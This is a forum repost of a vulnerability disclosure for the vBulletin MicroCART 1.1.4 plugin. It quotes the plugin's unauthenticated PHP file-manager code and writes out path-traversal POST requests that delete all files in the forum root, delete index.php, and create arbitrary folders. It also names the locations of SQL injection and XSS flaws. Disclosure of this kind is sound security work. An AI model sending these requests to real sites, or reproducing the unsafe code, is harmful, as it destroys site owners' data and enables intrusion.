Jump to content
Nytro

vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[h=1]vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS[/h]

# Exploit Title: vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion,
SQL Injection & XSS
# Date: January 8, 2015
# Exploit Author: Technidev (https://technidev.com)
# Vendor Homepage: https://vbulletin.com
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=256723
# Version: 1.1.4

This plugin is fairly old but still used by a lot of people and received
its last update nearly 4 years ago.
It’s vulnerable to arbitrary file deletion and SQL injection.

*Arbitrary File(s) Deletion*
In /microcart/editor/assetmanager/ are a bunch of files which are
probably used to manage files/folders for the administrator,
unfortunately no authentication and checks were added to see if the user
should have access to it and if the request doesn’t contain anything
malicious.

The /microcart/editor/assetmanager/folderdel_.php file contains the
following on top:

$sMsg = "";

if(isset($_POST["inpCurrFolder"]))
   {
   $sDestination = pathinfo($_POST["inpCurrFolder"]);

   //DELETE ALL FILES IF FOLDER NOT EMPTY
     $dir = $_POST["inpCurrFolder"];
     $handle = opendir($dir);
     while($file = readdir($handle)) if($file != "." && $file != "..")
unlink($dir . "/" . $file);
     closedir($handle);

   if(rmdir($_POST["inpCurrFolder"])==0)
     $sMsg = "";
   else
     $sMsg = "<script>document.write(getTxt('Folder deleted.'))</script>";
   }
By simply sending a POST request to this file, we can delete every
single file in specified folder.

POST to:    /microcart/editor/assetmanager/folderdel_.php
POST data:    inpCurrFolder: ../../../
This POST request will delete every single .php file in the root folder
of vBulletin.

*Arbitrary File Deletion*
There’s another vulnerability which resides in the
/microcart/editor/assetmanager/assetmanager.php file. It contains an
upload function, which is safe, and a file deletion function, which is
not safe. We can delete any file off the server by abusing this. So
unlike the previous vulnerability I just wrote which deletes all files
by sending a POST request with a folder value, this will only delete 1
file off the server.

Vulnerable code:
if(isset($_POST["inpFileToDelete"]))
   {
   $filename=pathinfo($_POST["inpFileToDelete"]);
   $filename=$filename['basename'];
   if($filename!="")
     unlink($currFolder . "/" . $filename);
   $sMsg = "";
   }
Exploited by sending the following request:

POST to:    /microcart/editor/assetmanager/assetmanager.php
POST data:    inpCurrFolder: ../../../
         inpFileToDelete: index.php
This will delete the /index.php file of vBulletin, in the root.

*Aribtrary Folder Creation*
Besides the file deletion, there’s a file called
/microcart/editor/assetmanager/foldernew.php which created a 0755
chmodded folder on the server.
The file contains the following on top:
$sMsg = "";

if(isset($_POST["inpNewFolderName"]))
   {
   $sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"];

   if(is_dir($sFolder)==1)
     {//folder already exist
     $sMsg = "<script>document.write(getTxt('Folder already
exists.'))</script>";
     }
   else
     {
     //if(mkdir($sFolder))
     if(mkdir($sFolder,0755))
       $sMsg = "<script>document.write(getTxt('Folder created.'))</script>";
     else
       $sMsg = "<script>document.write(getTxt('Invalid input.'))</script>";
     }
   }
By sending the following POST request, we will create a folder with 0755
chmodded permission.

POST to:    /microcart/editor/assetmanager/foldernew.php
POST data:    inpNewFolderName:     davewashere
         inpCurrFolder:         ../../..
This POST request will create the folder davewashere in the root of the
vBulletin forum.

*SQL Injection*
MicroCART is also vulnerable to SQL injection at several locations
although most of them are rather hard to abuse. I will not explain how
to exploit it, but the vulnerability can be found at /cart.php line 833
to 881 and the function where you can add products to your shopping
cart, at around line 1251 to 1328 where $_POST[‘fields’] is assigned to
the configuration variable which is later used in a query.

*Cross Site Scripting*
When modifying your information at /cart.php?do=cpanel, you can inject
anything you want into the fields.
Viewing reviews of products may be vulnerable as well when you leave out
the wysiwyg POST key.

Sursa: vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...